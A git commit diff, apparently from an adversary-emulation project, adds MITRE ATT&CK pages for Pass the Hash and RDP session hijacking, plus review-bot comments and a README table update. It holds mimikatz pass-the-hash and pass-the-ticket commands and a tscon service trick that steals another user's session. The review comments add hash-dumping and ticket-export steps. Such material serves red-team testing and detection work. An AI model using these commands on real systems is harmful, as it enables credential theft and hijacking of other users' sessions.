Lateral Movement

+ PtH
+ RDP
Michael Haag
2018-04-06 08:21:28 -04:00
parent a023d346cb
commit 0bfdcfa480
3 changed files with 35 additions and 2 deletions
+15
@@ -0,0 +1,15 @@
## Pass the Hash
MITRE ATT&CK Technique: [T1075](https://attack.mitre.org/wiki/Technique/T1075)
#### Mimikatz
Note: must dump hashes first
`mimikatz # sekurlsa::pth /user:Administrator /domain:atomic.local /ntlm:cc36cf7a8514893efccd3324464tkg1a`
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
#### Kerberos Ticket attack
`mimikatz # kerberos::ptt Administrator@krbtgt-atomic.LOCAL.kirbi`
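Review bot: the sample hash in the `sekurlsa::pth` line, `cc36cf7a8514893efccd3324464tkg1a`, contains the non-hex characters `t`, `k` and `g`, so mimikatz will reject it as written; an NT hash is 32 hex characters. Use an obvious placeholder such as `/ntlm:<NT hash>` so nobody pastes it verbatim, and make the "must dump hashes first" note say where the hash comes from (`sekurlsa::logonpasswords` on a box where the user has a logon session, or `lsadump::sam` for local accounts). The `#### Kerberos Ticket attack` subsection is Pass the Ticket, not Pass the Hash: either say so and give it its own ATT&CK reference, or move it to a separate Pass_the_Ticket.md so the file name, heading and technique ID stay consistent. The `kerberos::ptt` line also assumes `Administrator@krbtgt-atomic.LOCAL.kirbi` already exists; a one-line pointer to how it was exported (`sekurlsa::tickets /export`) would make the step reproducible.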
@@ -0,0 +1,18 @@
## Remote Desktop Protocol
MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076)
#### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
retrieve the session ID:
query user
Set the session ID and rdp-tcp# retrieved from `query user`
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
Access the session:
net start sesshijack
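Review bot: the argument roles in `sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"` are the reverse of what "Set the session ID and rdp-tcp# retrieved from `query user`" suggests: the first tscon argument (`1`) is the ID of the session being taken over, and `/dest:rdp-tcp#55` is the name of the session you are sitting in, which receives the other user's desktop. Spell out which value is which, and note that this works because `sc create` without `obj=` runs the binary as LocalSystem, so the step needs local administrator rights on the host. A `sc delete sesshijack` cleanup line after `net start sesshijack` would also be worth adding. For consistency with the Pass_the_Hash file, wrap `query user`, the `sc create` line and `net start sesshijack` in backticks.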
+2 -2
@@ -6,9 +6,9 @@
| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | [Dynamic Data Exchange](Execution/Dynamic_Data_Exchange.md) | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
| [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | [Logon Scripts](Persistence/Logon_Scripts.md) | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol |
| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | [Pass the Hash](Lateral_Movement/Pass_the_Hash.md) | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | [Remote Desktop Protocol](Lateral_Movement/Remote_Desktop_Protocol.md) | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting |
| Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels |
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
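Review bot: `Pass the Ticket` on the `| Bootkit |` row stays unlinked even though the Pass_the_Hash.md added in this commit carries a `#### Kerberos Ticket attack` section with `kerberos::ptt`; either link that cell to the same file or split the ticket content into its own Lateral_Movement/Pass_the_Ticket.md and link it here, so the README table and the per-technique files stay one-to-one.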